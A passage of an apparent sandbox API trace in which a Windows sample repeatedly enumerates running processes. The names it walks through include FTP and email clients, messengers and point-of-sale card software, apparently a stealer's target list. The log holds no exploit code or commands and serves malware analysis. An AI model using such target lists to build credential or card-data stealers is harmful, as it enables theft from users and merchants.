szExeFile="side-end-death.exe")) returned 1 [0260.409] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0260.410] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0260.412] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0260.413] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0260.415] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0260.416] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0260.419] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0260.420] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0260.422] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0260.465] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0260.466] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0260.467] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0260.469] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0260.471] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0260.472] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0260.474] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0260.476] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0260.478] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0260.480] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0260.482] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0260.485] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0260.487] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0260.490] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0260.491] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0260.493] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0260.497] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0260.499] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0260.501] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0260.550] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0260.552] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0260.554] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0260.556] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0260.558] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0260.560] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0260.562] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0260.563] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0260.565] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0260.570] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0260.571] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0260.573] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0260.575] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0260.577] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0260.579] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0260.580] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0260.582] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0260.584] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0260.586] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0260.627] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0260.629] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0260.631] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0260.632] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0260.634] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0260.636] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0260.638] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0260.640] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0260.645] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0260.646] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0260.648] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0260.650] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0260.652] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.653] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.655] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0260.656] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.658] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.660] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0260.661] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0260.663] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0260.702] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0260.703] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0260.705] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0260.706] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0260.708] CloseHandle (hObject=0x2338) returned 1 [0260.708] Sleep (dwMilliseconds=0x64) [0260.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0260.762] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.764] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.765] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.767] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.768] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.770] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.771] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.773] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.857] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.859] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.860] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.862] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: 